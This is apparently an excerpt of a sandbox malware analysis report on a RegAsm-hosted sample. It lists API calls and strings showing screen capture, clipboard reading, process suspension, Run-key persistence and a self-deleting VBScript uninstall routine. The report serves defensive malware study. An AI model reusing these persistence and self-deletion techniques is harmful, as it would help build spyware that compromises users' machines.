                                                                                  • API String ID: 3906539128-0
                                                                                  • Opcode ID: 1e0b73e88f7870ac8a7e49df57248e9339733cda2bb7518ac33a0b9eb889d704
                                                                                  • Instruction ID: 25e88f5a56b9fbea854716c485460a06fbe33a825339a9765be54c88dd7cea35
                                                                                  • Opcode Fuzzy Hash: 1e0b73e88f7870ac8a7e49df57248e9339733cda2bb7518ac33a0b9eb889d704
                                                                                  • Instruction Fuzzy Hash: 0431D374901218ABCB21DF65D9887CDBBB8EF0C311F5051EAE81CA7251EB749F818F48
                                                                                  APIs
                                                                                  • GetCurrentProcess.KERNEL32(?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004AD5
                                                                                  • TerminateProcess.KERNEL32(00000000,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004ADC
                                                                                  • ExitProcess.KERNEL32 ref: 10004AEE
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4546320120.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4546280163.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4546320120.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_10000000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                  • String ID:
                                                                                  • API String ID: 1703294689-0
                                                                                  • Opcode ID: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                                                                                  • Instruction ID: 67c7ca3480f18a9b01e05da0926f82de4ad888d39fdd55e1be860e0f4a97641b
                                                                                  • Opcode Fuzzy Hash: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                                                                                  • Instruction Fuzzy Hash: 04E04676000218AFEF01BF25CD48B493B6AEF013C1F128010F9088B029CB35ED52CA68
                                                                                  APIs
                                                                                  • GetCurrentProcess.KERNEL32(?,?,0044332B,?), ref: 00443376
                                                                                  • TerminateProcess.KERNEL32(00000000,?,0044332B,?), ref: 0044337D
                                                                                  • ExitProcess.KERNEL32 ref: 0044338F
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                  • String ID:
                                                                                  • API String ID: 1703294689-0
                                                                                  • Opcode ID: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
                                                                                  • Instruction ID: 4b22f3a5ffe79ca7dfb81d814e561f82a31e4bef9a776fe0bb9daccb8e878f4b
                                                                                  • Opcode Fuzzy Hash: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
                                                                                  • Instruction Fuzzy Hash: 9FE0B635401608FBDF11AF55DE09A5D3BAAEB40B56F005469FC498A272CF79EE42CB88
                                                                                  APIs
                                                                                  • OpenClipboard.USER32(00000000), ref: 0040B74C
                                                                                  • GetClipboardData.USER32(0000000D), ref: 0040B758
                                                                                  • CloseClipboard.USER32 ref: 0040B760
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Clipboard$CloseDataOpen
                                                                                  • String ID:
                                                                                  • API String ID: 2058664381-0
                                                                                  • Opcode ID: ee7560bd864c47a473b03ccd03fab4bf0c670c3a92a751b3696d255e79ff2f15
                                                                                  • Instruction ID: 1c65eecdd0087a0ffd0b0a04a5b63b9ff0c479b34dfa65f2e767e94bdce73387
                                                                                  • Opcode Fuzzy Hash: ee7560bd864c47a473b03ccd03fab4bf0c670c3a92a751b3696d255e79ff2f15
                                                                                  • Instruction Fuzzy Hash: 45E0EC31745320EFC3206B609C49F9B6AA4DF85B52F05443AB905BB2E5DB78CC4086AD
                                                                                  APIs
                                                                                  • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,0041605F,00000000), ref: 0041BBD1
                                                                                  • NtResumeProcess.NTDLL(00000000), ref: 0041BBDE
                                                                                  • CloseHandle.KERNEL32(00000000,?,?,0041605F,00000000), ref: 0041BBE7
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Process$CloseHandleOpenResume
                                                                                  • String ID:
                                                                                  • API String ID: 3614150671-0
                                                                                  • Opcode ID: dda695613aab68fa1ce07225af6d1ac6bad924da5be1ebe3a2a6355b7b364d52
                                                                                  • Instruction ID: 00af7d86c2812e48088786baf9e1e683bef33431c8858657b58e82835f0f92e7
                                                                                  • Opcode Fuzzy Hash: dda695613aab68fa1ce07225af6d1ac6bad924da5be1ebe3a2a6355b7b364d52
                                                                                  • Instruction Fuzzy Hash: 7AD05E36204121E3C220176A7C0CD97AD68DBC5AA2705412AF804C22609A60CC0186E4
                                                                                  APIs
                                                                                  • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,0041603A,00000000), ref: 0041BBA5
                                                                                  • NtSuspendProcess.NTDLL(00000000), ref: 0041BBB2
                                                                                  • CloseHandle.KERNEL32(00000000,?,?,0041603A,00000000), ref: 0041BBBB
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Process$CloseHandleOpenSuspend
                                                                                  • String ID:
                                                                                  • API String ID: 1999457699-0
                                                                                  • Opcode ID: dd0b989ddcc61b84e262834eab0f6eafaf8d61dce4d0b86b08aa1b4c832549dd
                                                                                  • Instruction ID: 611eda4fe747f1c58df557fb912083c2b4b70512fbfbfb6239720577e9304ccf
                                                                                  • Opcode Fuzzy Hash: dd0b989ddcc61b84e262834eab0f6eafaf8d61dce4d0b86b08aa1b4c832549dd
                                                                                  • Instruction Fuzzy Hash: 98D05E36204121E3C7211B6A7C0CD97AD68DFC5AA2705412AF804D26549A20CC0186E4
                                                                                  APIs
                                                                                  • IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 00434CCF
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FeaturePresentProcessor
                                                                                  • String ID: MZ@
                                                                                  • API String ID: 2325560087-2978689999
                                                                                  • Opcode ID: 4259bdeace04940204f61aa74a979230364aaba3051b8f8e0efcae6fb7ed6494
                                                                                  • Instruction ID: 5e37b39ef68b784d6588b9ddffa6793edf4c3ade0924e8be62ba08be237937aa
                                                                                  • Opcode Fuzzy Hash: 4259bdeace04940204f61aa74a979230364aaba3051b8f8e0efcae6fb7ed6494
                                                                                  • Instruction Fuzzy Hash: E4515B71D002488FEB24CF69D98579EBBF4FB88314F24956BD419EB264D378A940CF98
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4546320120.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4546280163.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4546320120.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_10000000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: .
                                                                                  • API String ID: 0-248832578
                                                                                  • Opcode ID: d62ff9c274239ee522e16b5fb8162bf78a9045f13a61a74130903e5937500e37
                                                                                  • Instruction ID: 9046c4836333a0efab45ea1e09b7d9ff5bbd95f87beecc7c41f4b92e1cb642f0
                                                                                  • Opcode Fuzzy Hash: d62ff9c274239ee522e16b5fb8162bf78a9045f13a61a74130903e5937500e37
                                                                                  • Instruction Fuzzy Hash: 45313771800159AFEB14CF74CC84EEA7BBEDB49384F200198F81997259E6319E448B60
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: .
                                                                                  • API String ID: 0-248832578
                                                                                  • Opcode ID: e4ba95ef050ff9873834a062f40f8bfe8ca2f849e5d953d5b04f24550caf4fd0
                                                                                  • Instruction ID: 7baa6cf80f4bdea99dbc4d330b45aada8194c6230f36d830dc1b60d3871032d3
                                                                                  • Opcode Fuzzy Hash: e4ba95ef050ff9873834a062f40f8bfe8ca2f849e5d953d5b04f24550caf4fd0
                                                                                  • Instruction Fuzzy Hash: DF3107B1900259AFEB24DE7ACC84EFB7BBDEB46318F0401AEF41897291E6349D418B54
                                                                                  APIs
                                                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                  • EnumSystemLocalesW.KERNEL32(00452393,00000001,?,?,JD,?,00452734,JD,?,?,?,?,?,00444AED,?,?), ref: 00452102
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                  • String ID: JD
                                                                                  • API String ID: 1084509184-2669065882
                                                                                  • Opcode ID: 43afbb6a7401c46fb6bd1099fc40b6d5da7848bdbd3577d5ff827f5c50c4ae4e
                                                                                  • Instruction ID: 883a99871793c155097d9da94a803295819168bd30f8f35cc04eca091e96b9f4
                                                                                  • Opcode Fuzzy Hash: 43afbb6a7401c46fb6bd1099fc40b6d5da7848bdbd3577d5ff827f5c50c4ae4e
                                                                                  • Instruction Fuzzy Hash: E8F0FF363007056FDB245F399881A6B7B96FB82769B04482EFE458B682DAB99C42D604
                                                                                  APIs
                                                                                  • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004489C0
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: InfoLocale
                                                                                  • String ID: GetLocaleInfoEx
                                                                                  • API String ID: 2299586839-2904428671
                                                                                  • Opcode ID: 53574c2ecf56bfb558b2c309ca3eb91f9c7a0a18e0f2245662e0b0bedf18becb
                                                                                  • Instruction ID: 58f0578312c774904006f9ed4749830948a62bec6dc8fde4d932476f73229d15
                                                                                  • Opcode Fuzzy Hash: 53574c2ecf56bfb558b2c309ca3eb91f9c7a0a18e0f2245662e0b0bedf18becb
                                                                                  • Instruction Fuzzy Hash: C0F0F631640608FBDB016F61DC06F6E7B25EB04751F00056EFC0966251DE368D2096DE
                                                                                  APIs
                                                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004523E7
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$_free$InfoLocale_abort
                                                                                  • String ID:
                                                                                  • API String ID: 1663032902-0
                                                                                  • Opcode ID: b4047fd74fafd511f87100a415ff7352fa71784cc782813174b617cf7262d9f7
                                                                                  • Instruction ID: 2d4dd0c1c30cd12b50dfb53a4a1f7f5f9091958bb121381f53cce851c87d7921
                                                                                  • Opcode Fuzzy Hash: b4047fd74fafd511f87100a415ff7352fa71784cc782813174b617cf7262d9f7
                                                                                  • Instruction Fuzzy Hash: F921D632600606ABDB249F25DD41FBB73A8EB06316F10407FED01D6152EBBC9D48CB59
                                                                                  APIs
                                                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                  • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00452361,00000000,00000000,?), ref: 004525EF
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$InfoLocale_abort_free
                                                                                  • String ID:
                                                                                  • API String ID: 2692324296-0
                                                                                  • Opcode ID: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                                                                  • Instruction ID: 8c29d710edde3bbc403447a64c1727e90569dbd09ff88c71ffccea9529c81983
                                                                                  • Opcode Fuzzy Hash: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                                                                  • Instruction Fuzzy Hash: C4F04936A00116BBDB245A24D905BBF7B58EB01315F04446BEC05A3241FAF8FD058694
                                                                                  APIs
                                                                                    • Part of subcall function 00445909: EnterCriticalSection.KERNEL32(-0006D41D,?,0044305C,00000000,0046E938,0000000C,00443017,?,?,?,00445BA7,?,?,0044834A,00000001,00000364), ref: 00445918
                                                                                  • EnumSystemLocalesW.KERNEL32(0044843E,00000001,0046EAE0,0000000C), ref: 004484BC
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                  • String ID:
                                                                                  • API String ID: 1272433827-0
                                                                                  • Opcode ID: 08771b5932cf67d2f7a499a1ea32343f451e1cff339441a182db03018af17ba2
                                                                                  • Instruction ID: 901ea181f65c0ebd25502bb0be635eecd519ab6688482fb1bf3a60b9f01fb263
                                                                                  • Opcode Fuzzy Hash: 08771b5932cf67d2f7a499a1ea32343f451e1cff339441a182db03018af17ba2
                                                                                  • Instruction Fuzzy Hash: 37F04F76A50200EFEB00EF69D946B4D37E0FB04725F10446EF514DB2A2DB7899809B49
                                                                                  APIs
                                                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                  • EnumSystemLocalesW.KERNEL32(00451F27,00000001,?,?,?,00452792,JD,?,?,?,?,?,00444AED,?,?,?), ref: 00452007
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                  • String ID:
                                                                                  • API String ID: 1084509184-0
                                                                                  • Opcode ID: 06cdaad2b1dd0330ee545a4703de2c72ad4f4425d90ac6c7aa7d45dfeb8c5d5b
                                                                                  • Instruction ID: 16a122e2f6617649f53ffd93528404cf76eb0d70ff9257d35f530b0535ef024d
                                                                                  • Opcode Fuzzy Hash: 06cdaad2b1dd0330ee545a4703de2c72ad4f4425d90ac6c7aa7d45dfeb8c5d5b
                                                                                  • Instruction Fuzzy Hash: 84F0203630020597CB04AF75D845B6A7F90EB82729B06009AFE058B6A2C7799842C754
                                                                                  APIs
                                                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_00034BE4,0043490B), ref: 00434BDD
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                  • String ID:
                                                                                  • API String ID: 3192549508-0
                                                                                  • Opcode ID: 2ffe05228c785604148d814c7fc250910b5f8136668f43492b8067ac5164d55b
                                                                                  • Instruction ID: 702e07acd891e046c8aea5fc6397425f5e3bd38ef0af78e1c7fed93ac6412050
                                                                                  • Opcode Fuzzy Hash: 2ffe05228c785604148d814c7fc250910b5f8136668f43492b8067ac5164d55b
                                                                                  • Instruction Fuzzy Hash:
                                                                                  APIs
                                                                                  • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418ECB
                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 00418ED8
                                                                                    • Part of subcall function 00419360: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419390
                                                                                  • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F4E
                                                                                  • DeleteDC.GDI32(00000000), ref: 00418F65
                                                                                  • DeleteDC.GDI32(00000000), ref: 00418F68
                                                                                  • DeleteObject.GDI32(00000000), ref: 00418F6B
                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00418F8C
                                                                                  • DeleteDC.GDI32(00000000), ref: 00418F9D
                                                                                  • DeleteDC.GDI32(00000000), ref: 00418FA0
                                                                                  • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418FC4
                                                                                  • GetCursorInfo.USER32(?), ref: 00418FE2
                                                                                  • GetIconInfo.USER32(?,?), ref: 00418FF8
                                                                                  • DeleteObject.GDI32(?), ref: 00419027
                                                                                  • DeleteObject.GDI32(?), ref: 00419034
                                                                                  • DrawIcon.USER32(00000000,?,?,?), ref: 00419041
                                                                                  • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 00419077
                                                                                  • GetObjectA.GDI32(00000000,00000018,?), ref: 004190A3
                                                                                  • LocalAlloc.KERNEL32(00000040,00000001), ref: 00419110
                                                                                  • GlobalAlloc.KERNEL32(00000000,?), ref: 0041917F
                                                                                  • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004191A3
                                                                                  • DeleteDC.GDI32(?), ref: 004191B7
                                                                                  • DeleteDC.GDI32(00000000), ref: 004191BA
                                                                                  • DeleteObject.GDI32(00000000), ref: 004191BD
                                                                                  • GlobalFree.KERNEL32(?), ref: 004191C8
                                                                                  • DeleteObject.GDI32(00000000), ref: 0041927C
                                                                                  • GlobalFree.KERNEL32(?), ref: 00419283
                                                                                  • DeleteDC.GDI32(?), ref: 00419293
                                                                                  • DeleteDC.GDI32(00000000), ref: 0041929E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIconInfo$BitmapBitsCursorDisplayDrawEnumLocalSelectSettingsStretch
                                                                                  • String ID: DISPLAY
                                                                                  • API String ID: 4256916514-865373369
                                                                                  • Opcode ID: dfe77fb2dceb0fbb205aabf54f767b908c25502d30906bbb63463b6629d02dd1
                                                                                  • Instruction ID: e1b8f987aa81746083de8242de432fb1856ba331ec6d7e725e66c1191a76d441
                                                                                  • Opcode Fuzzy Hash: dfe77fb2dceb0fbb205aabf54f767b908c25502d30906bbb63463b6629d02dd1
                                                                                  • Instruction Fuzzy Hash: 64C14C71504301AFD720DF25DC48BABBBE9EB88715F04482EF98993291DB34ED45CB6A
                                                                                  APIs
                                                                                    • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                                                    • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D558
                                                                                  • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D56B
                                                                                  • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D584
                                                                                  • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D5B4
                                                                                    • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,004752D8,004752F0,?,pth_unenc), ref: 0040B8F6
                                                                                    • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B902
                                                                                    • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(Function_0000A2A2,00000000,?,pth_unenc), ref: 0040B910
                                                                                    • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466478,00000000,00000000,0040D434,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C4C1
                                                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D7FF
                                                                                  • ExitProcess.KERNEL32 ref: 0040D80B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                  • String ID: """, 0$")$8SG$@qF$@qF$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                                                                  • API String ID: 1861856835-1447701601
                                                                                  • Opcode ID: d8e98d1fd2f1bdc760dae9a559abea4cd274c949fa03be3778951f2c3f1c4be1
                                                                                  • Instruction ID: 9f807323933333198641953f201c1fc8368d74e19fdabe041c5449f7db564f80
